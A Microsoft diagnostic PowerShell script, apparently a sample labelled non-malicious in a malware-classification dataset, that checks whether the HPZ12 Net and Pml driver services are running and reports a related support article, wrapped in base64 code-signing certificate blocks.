Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjo4 # RDQxLTRCRjctQjNCNzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUAPYiXu8ORQ4hvKcuE7GK0COgxWnqggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOoan5QwIhgPMjAyNDA2MTcxOTQyMTJaGA8yMDI0MDYxODE5NDIxMlowdDA6Bgor # BgEEAYRZCgQBMSwwKjAKAgUA6hqflAIBADAHAgEAAgIQ5DAHAgEAAgIThTAKAgUA # 6hvxFAIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID # B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBALmPbbM0gSRDWdsruMIG # /0aAyVjICnNlHzBLdbXqwBGK49Yaks7Gvv4vWX6FbGE/Q2KZwK4MuSiTpHar2uxj # w5l9iX/asSa5h1ynVZ0hKSIze5GuhKjjxiPnHn60wEbj58AvLl7rKTRJWdmU630E # EmUED23dlOpr0wjSZpVzhf8dMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt # U3RhbXAgUENBIDIwMTACEzMAAAHj372bmhxogyIAAQAAAeMwDQYJYIZIAWUDBAIB # BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx # IgQgKRxEWIV8THK6SGQEZFPK5Z9RDWlC4+/XVfgfjwmMx64wgfoGCyqGSIb3DQEJ # EAIvMYHqMIHnMIHkMIG9BCAz1COr5bD+ZPdEgQjWvcIWuDJcQbdgq8Ndj0xyMuYm # KjCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB49+9 # m5ocaIMiAAEAAAHjMCIEIHxu1ahfMqchp4Oq223alQ4XlCQKMSrOFiHCkNhyGJ8u # MA0GCSqGSIb3DQEBCwUABIICADnpvPz14HLBy3Kzl4PZCH2JjnKPZ3QJolQAIPbn # Y5XiQVSQuvcORd7HSfxBziJpvpSWw822KHdrEpj4KidDwsANrEURZ8n3T31son/t # QCAohqHs085P10iIFh2f/FbeiG9n+TuUfTLUkIy5PuNjAmH3lfnAqEXM9fNpr1zD # ntJPkX4l7yOWXXJOJJ6E1Nc0Ga8HXixaK9w4q5bxAW8BMAud2Cocoi4g8tz6NI9P # gBKZbH5+PC4hyvhzwJDP5gv6Sbn0aPETz73G0eo3srC3XbzPHxQL3KoaseCWbP7A # bFJ7daIuFYdTvhdaFZNO5D2kCIFzKe2D0piN9IpRKKVDltsufZ54HHR6gw4ujH8u # MrfKy+irPA6/hyI/BqPAa+ew6F3FJNOFmE4vArvYDtbD299J5aABoSNHmFNe/rvu # KKzcnO9eLnay700nQo5WqUdr3LXHxPolV7NPujIo/qNRpFAZ18MZedO0P56h18Sg # ICnX0eQnv5sekXGwPc4li0t/5BLg4jN0wRESYjTctbrOA8A8daxA6sGYb1HZ9dM/ # ekiRmIRvjDsL7tylVlB3fg/N5Y2CWngPE6BbaJnL34UncYbNxIEnZl9CRuFvHQOi # VUNS8lW7ZoDGfsMn5UFMPbuW2Py4vEFtxHqLP2FFRWfGRDoJ7DdwCtwpdS7bVRma # L2/a # SIG # End signature block
combined_dataset/train/non-malicious/sample_12_68.ps1
sample_12_68.ps1
#************************************************ # TS_HPZ12ServiceCheck.ps1 # Version 1.0 # Date: 1-11-2011 # Author: v-anecho # Description: Checks if 'Net Driver HPZ12' or 'Pml Driver HPZ12' is one of the installed services and startup type is something different than Disabled #************************************************ Import-LocalizedData -BindingVariable ScriptStrings Write-DiagProgress -Activity $ScriptStrings.ID_HPZ12ServiceCheck -Status $ScriptStrings.ID_HPZ12ServiceCheckDesc $RootCauseDetected = $false $RootCauseName = "RC_HPZ12ServiceCheck" #Rule ID 1970 #----------- # http://sharepoint/sites/rules/Rule%20Submissions/Windows_digvijan_2011-11-23T00_14_06.xml # #Description #----------- # Check if 'Net Driver HPZ12' or 'Pml Driver HPZ12' is one of theinstalled services and startup type is something different than Disabled # #Related KB #---------- # 2546364 # #Script Author #------------- # anecho #******************** #Data gathering #******************** $InformationCollected = new-object PSObject $HasIssue = $false Function isNetPmlRunnig { $currentServices = Get-Service # grabs all services to prevent pulling running services multiple times $NetDriver = $currentServices | Where-Object {($_.displayname -eq "Net Driver HPZ12") -and ($_.status -ne "Stopped")} $PmlDriver = $currentServices | Where-Object {$_.displayname -eq "Pml Driver HPZ12" -and ($_.status -ne "Stopped")} if(($NetDriver) -and ($PmlDriver)) #returns number to identify which process is running { return 3 } elseif($NetDriver) { return 1 } elseif($PmlDriver) { return 2 } else { return 0 } } #******************** #Detection Logic #******************** $isNetPml = isNetPmlRunnig if ($isNetPml -gt 0) { $HasIssue = $true } #******************** #Alert Evaluation #******************** if($HasIssue) { $runningServices = "" switch ($isNetPml) { 1{$runningServices = "Net Driver HPZ12"} 2{$runningServices = "Pml Driver HPZ12"} 3{$runningServices = "Net Driver HPZ12, Pml Driver HPZ12"} } add-member -inputobject $InformationCollected -membertype noteproperty -name "Service(s) Running" -value $runningServices Update-DiagRootCause -id $RootCauseName -Detected $true Write-GenericMessage -RootCauseId $RootCauseName -PublicContentURL "https://vkbexternal.partners.extranet.microsoft.com/VKBWebService/ViewContent.aspx?scid=B;EN-US;2546364" -Verbosity "Error" -InformationCollected $InformationCollected -Visibility 2 -SupportTopicsID 8066 } else { Update-DiagRootCause -id $RootCauseName -Detected $false } # SIG # Begin signature block # MIIoOQYJKoZIhvcNAQcCoIIoKjCCKCYCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDaTypf795A48Ct # O16St+rnH28ZWd2ITdpcYxGC0SkpV6CCDYUwggYDMIID66ADAgECAhMzAAAEA73V # lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV # LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY # oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi # kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/ # /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv # ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r # EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV # NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC # rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos # oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB # +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO # raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+ # sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W # +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s # IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu # iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA # BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIKCz # FrWw81mURdtlfbm+R5ANkfDbIXLhJScmcfcilmtWMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAg2ERqVqoACZrPLf64JvCKvFOE0RvRsDuU35G # n6YMBE/kEmnk8gZpQofAIYMSf+oSEN6R84d20ZOWVdzmR3nF2Kx7TShOyipWPaS+ # 33fZEyHeH3tDu97FTu2Dxp8+O0GcC9Y2S2dqt3b1y084XaxUMLab7psR9MCFsET8 # JAEDfldQpeFhTV1C1Gi5BIW0K5I7bNOw5Sm6ZyNrtgsrtiVQB6miqIKcf2fRKtf9 # J7g7RFoTtUJJcSJjd3BZ8unvSBPij/tZZDH7xIJSZOEUZlnTvVtG+yPSzy2PFBya # GtpQq7rIPTfk6OOVNFwcffCKG4YqwPr4iA9BFGnc50HNDuO886GCF5QwgheQBgor # BgEEAYI3AwMBMYIXgDCCF3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCBVXvfKct9XIeCNYNQInL23hujGLZbGMZzc # g2NdsRl7JwIGZxpym1wXGBMyMDI0MTAyODExNDA0My4wMzFaMASAAgH0oIHRpIHO # MIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQL # ExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxk # IFRTUyBFU046QTQwMC0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l # LVN0YW1wIFNlcnZpY2WgghHqMIIHIDCCBQigAwIBAgITMwAAAezgK6SC0JFSgAAB # AAAB7DANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDAeFw0yMzEyMDYxODQ1MzhaFw0yNTAzMDUxODQ1MzhaMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046QTQwMC0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Uw # ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCwR/RuCTbgxUWVm/Vdul22 # uwdEZm0IoAFs6oIr39VK/ItP80cn+8TmtP67iabB4DmAKJ9GH6dJGhEPJpY4vTKR # SOwrRNxVIKoPPeUF3f4VyHEco/u1QUadlwD132NuZCxbnh6Mi2lLG7pDvszZqMG7 # S3MCi2bk2nvtGKdeAIL+H77gL4r01TSWb7rsE2Jb1P/N6Y/W1CqDi1/Ib3/zRqWX # t4zxvdIGcPjS4ZKyQEF3SEZAq4XIjiyowPHaqNbZxdf2kWO/ajdfTU85t934CXAi # nb0o+uQ9KtaKNLVVcNf5QpS4f6/MsXOvIFuCYMRdKDjpmvowAeL+1j27bCxCBpDQ # HrWkfPzZp/X+bt9C7E5hPP6HVRoqBYR7u1gUf5GEq+5r1HA0jajn0Q6OvfYckE0H # dOv6KWa+sAmJG7PDvTZae77homzx6IPqggVpNZuCk79SfVmnKu9F58UAnU58TqDH # EzGsQnMUQKstS3zjn6SU0NLEFNCetluaKkqWDRVLEWbu329IEh3tqXPXfy6Rh/wC # bwe9SCJIoqtBexBrPyQYA2Xaz1fK9ysTsx0kA9V1JwVV44Ia9c+MwtAR6sqKdAgR # o/bs/Xu8gua8LDe6KWyu974e9mGW7ZO8narDFrAT1EXGHDueygSKvv2K7wB8lAgM # GJj73CQvr+jqoWwx6XdyeQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFPRa0Edk/iv1 # whYQsV8UgEf4TIWGMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G # A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv # Y3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBs # BggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0 # LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUH # AwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQCSvMSkMSrvjlDP # ag8ARb0OFrAQtSLMDpN0UY3FjvPhwGKDrrixmnuMfjrmVjRq1u8IhkDvGF/bffbF # Tr+IAnDSeg8TB9zfG/4ybknuopklbeGjbt7MLxpfholCERyEc20PMZKJz9SvzfuO # 1n5xrrLOL8m0nmv5kBcv+y1AXJ5QcLicmhe2Ip3/D67Ed6oPqQI03mDjYaS1NQhB # Ntu57wPKXZ1EoNToBk8bA6839w119b+a9WToqIskdRGoP5xjDIv+mc0vBHhZGkJV # vfIhm4Ap8zptC7xVAly0jeOv5dUGMCYgZjvoTmgd45bqAwundmPlGur7eleWYedL # Qf7s3L5+qfaY/xEh/9uo17SnM/gHVSGAzvnreGhOrB2LtdKoVSe5LbYpihXctDe7 # 6iYtL+mhxXPEpzda3bJlhPTOQ3KOEZApVERBo5yltWjPCWlXxyCpl5jj9nY0nfd0 # 71bemnou8A3rUZrdgKIautsH7SHOiOebZGqNu+622vJta3eAYsCAaxAcB9BiJPla # 7Xad9qrTYdT45VlCYTtBSY4oVRsedSADv99jv/iYIAGy1bCytua0o/Qqv9erKmzQ # CTVMXaDc25DTLcMGJrRua3K0xivdtnoBexzVJr6yXqM+Ba2whIVRvGcriBkKX0FJ # FeW7r29XX+k0e4DnG6iBHKQjec6VNzCCB3EwggVZoAMCAQICEzMAAAAVxedrngKb # SZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmlj # YXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy # NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT # B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE # AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXI # yjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjo # YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y # 